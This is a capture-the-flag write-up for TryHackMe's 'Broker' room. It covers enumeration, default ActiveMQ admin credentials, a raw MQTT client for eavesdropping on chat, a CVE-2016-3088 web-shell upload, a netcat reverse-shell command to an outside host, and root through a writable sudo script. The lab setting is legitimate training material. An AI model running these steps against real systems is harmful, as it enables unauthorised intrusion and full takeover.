Broker — TryHackMe

This is the write-up for TryHackMe’s room named Broker. The description says: Paul and Max found a way to chat at work by using a certain kind of software. They think they outsmarted their boss, but do not seem to know that eavesdropping is quite possible… They better be careful… Interesting. This room can be found here:

https://tryhackme.com/room/broker

As always, let’s scan the target with nmap to see what is running on it.

Enumeration

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.160.160

┌──(kali㉿kali)-[/]
└─$ sudo nmap -sS -Pn -T4 -p- 10.10.160.160
PORT STATE SERVICE
22/tcp open ssh
1883/tcp open mqtt
8161/tcp open patrol-snmp
42449/tcp open unknown

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,1883,8161,42449 10.10.160.160

┌──(kali㉿kali)-[/]
└─$ sudo nmap -O -A -Pn -T4 -p22,1883,8161,42449 10.10.160.160

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4c:75:a0:7b:43:87:70:4f:70:16:d2:3c:c4:c5:a4:e9 (RSA)
| 256 f4:62:b2:ad:f8:62:a0:91:2f:0a:0e:29:1a:db:70:e4 (ECDSA)
|_ 256 92:d2:87:7b:98:12:45:93:52:03:5e:9e:c7:18:71:d5 (ED25519)
1883/tcp open mqtt?
8161/tcp open http Jetty 7.6.9.v20130131
|_http-server-header: Jetty(7.6.9.v20130131)
|_http-title: Apache ActiveMQ
42449/tcp open tcpwrapped

Do a TCP portscan on all ports with port number greater than 1000 and smaller than 10000! Which TCP ports do you find to be open? (counting up)

So from the nmap output above, the required ports are: 1883,8161

What is the name of the software they use?

Again, nmap clearly shows that the software used is ActiveMQ. Port 8161 is running HTTP, so let’s check it out in the browser.

Yes, it is indeed ActiveMQ. So let’s brute force the directories that might prove useful using ffuf.

FFUF

┌──(kali㉿kali)-[/tmp]
└─$ ffuf -u http://10.10.99.191:8161/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.2.1
________________________________________________
:: Method : GET
:: URL : http://10.10.99.191:8161/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
images [Status: 302, Size: 0, Words: 1, Lines: 1]
index.html [Status: 200, Size: 5968, Words: 2626, Lines: 134]
admin [Status: 401, Size: 1278, Words: 977, Lines: 33]
api [Status: 302, Size: 0, Words: 1, Lines: 1]
styles [Status: 302, Size: 0, Words: 1, Lines: 1]
[Status: 200, Size: 5968, Words: 2626, Lines: 134]
:: Progress: [882184/882184] :: Job [1/1] :: 987 req/sec :: Duration: [0:17:30] :: Errors: 0 ::

/admin looks interesting. Accessing this page prompts for a username and password. Searching around, I found that the default credentials for the Apache ActiveMQ administration console are simply admin/admin. Tried them and it worked; the console also shows the version number, 5.9.0.

Which videogame are Paul and Max talking about?

At this point it is clear that we need to talk to the MQTT daemon running on port 1883 (see the nmap scans). Searching for an MQTT client, I found this:

https://github.com/eclipse/paho.mqtt.python#getting-started

Also found this link very useful:

http://www.steves-internet-guide.com/into-mqtt-python-client/

But we still need a "topic" for subscribe() to subscribe to in order to receive messages. This was found here:

http://10.10.120.228:8161/admin/xml/topics.jsp

So I edited the code from the GitHub link and added the topic, the IP address of the target, and the MQTT version, which needed to be 3.1:

Ran the code with: python3 mqtt_client.py
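The edited client itself is not reproduced above, so as an added example (not the room's code and not from the author) here is the same subscription done with hand-built MQTT 3.1 packets instead of paho, which makes the protocol-level point explicit: the CONNECT carries no username or password bits, and the broker in this room accepts it anyway, so anyone who can reach port 1883 and knows a topic name receives every message on it. The client id `reader`, the topic `test/chat` used in the comments, and the broker address taken from the command line are constructed values.

```python
import socket
import struct
import sys

def _varint(n):                          # MQTT "remaining length": 7 bits per byte, high bit = more follows
    out = bytearray()
    while n > 127:
        out.append(n % 128 | 0x80)
        n //= 128
    return bytes(out + bytes([n]))

def _read_varint(data, i):               # inverse of _varint, decoding at data[i] -> (value, next index)
    value, shift = 0, 0
    while data[i] & 0x80:
        value |= (data[i] & 0x7F) << shift
        shift, i = shift + 7, i + 1
    return value | (data[i] << shift), i + 1

def _mqtt_str(s):                        # UTF-8 string with a 16-bit big-endian length prefix
    return struct.pack(">H", len(s.encode())) + s.encode()

def build_connect(client_id, keepalive=60):
    # MQTT 3.1 = protocol name "MQIsdp", level 3; flags 0x02 = clean session, no username/password bits
    body = _mqtt_str("MQIsdp") + bytes([3, 0x02]) + struct.pack(">H", keepalive) + _mqtt_str(client_id)
    return b"\x10" + _varint(len(body)) + body

def build_subscribe(topic, packet_id=1, qos=0):
    # SUBSCRIBE is type 8 and must carry reserved flag bits 0010, so the first byte is 0x82
    body = struct.pack(">H", packet_id) + _mqtt_str(topic) + bytes([qos])
    return b"\x82" + _varint(len(body)) + body

def parse_publish(packet):               # (topic, payload) for a PUBLISH packet (type 3), else None
    if packet[0] >> 4 != 3:
        return None
    qos = (packet[0] >> 1) & 0x03
    length, i = _read_varint(packet, 1)
    tlen = struct.unpack(">H", packet[i:i + 2])[0]
    topic = packet[i + 2:i + 2 + tlen].decode("utf-8")
    return topic, packet[i + 2 + tlen + (2 if qos else 0):i + length]  # QoS 1/2 add a packet id first

if __name__ == "__main__":               # usage: python3 mqtt_raw.py <broker ip> <topic from topics.jsp>
    with socket.create_connection((sys.argv[1], 1883), timeout=300) as s:
        s.sendall(build_connect("reader"))
        if s.recv(4)[3:4] != b"\x00":    # CONNACK: byte 3 is the return code, 0 = accepted (5 = not authorised)
            sys.exit("broker refused the connection")
        s.sendall(build_subscribe(sys.argv[2]))
        while True:                      # simplification: one MQTT packet per recv(), fine for short chat lines
            msg = parse_publish(s.recv(65535))
            if msg:
                print("%s: %s" % (msg[0], msg[1].decode("utf-8", "replace")))
```

The defensive takeaway is the CONNACK return code: a broker configured to require credentials and per-topic authorisation would answer this anonymous CONNECT with a non-zero code instead of relaying the chat.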

Voila! We are able to see the chat between Paul and Max, and the video game’s name was in this chat. Great. Now we need to exploit some vulnerability in this version of ActiveMQ to move forward. Searchsploit revealed a vulnerability which also applies to 5.9.0.

Reading the info in this Metasploit module led to a link to the CVE for the vulnerability:

https://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt

For some reason the Metasploit module for exploitation didn't work, so I searched around for another exploit and found this one on GitHub:

https://github.com/gsheller/ActiveMQ_putshell-CVE-2016-3088

It was pretty simple to run:

python3 ActiveMQ_putshell.py -u http://10.10.120.228:8161

This puts a web shell at http://10.10.120.228:8161/admin/guo.jsp, which can be used like http://10.10.120.228:8161/admin/guo.jsp?pwd=gshell&shell=whoami to get remote code execution.

Reverse Shell

To gain a reverse shell I tried a few payloads and this one worked. Note: start a netcat listener on the attacking machine before requesting the reverse shell payload URL, and replace the IP address with your own:

nc 10.8.98.192 9999 -e /bin/sh

http://10.10.120.228:8161/admin/guo.jsp?pwd=gshell&shell=%27nc%2010.8.98.192%209999%20-e%20/bin/sh%27

Upgrade and Stabilize Shell
Run the following commands on the target to upgrade the current shell:

/usr/bin/script -qc /bin/bash /dev/null
control+z to background
stty raw -echo
fg
export TERM=xterm

flag.txt

The flag was in the same directory where we got our reverse shell:

Privilege Escalation

Running sudo -l showed that we can run subcribe.py in the /opt/apache-activemq-5.9.0 directory as root. The current user activemq also has write permissions on this file.

So we can easily get root by adding the following code to subcribe.py (using nano, as vi was not available on the target):

import os
os.system("/bin/bash")

and then running it with sudo:

We are root and the root flag is at /root/root.txt.

This was an interesting room and the spying on the chat part was a winner for me. If you like the write-up please clap and follow me.

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs: Security+, PenTest+, AZ900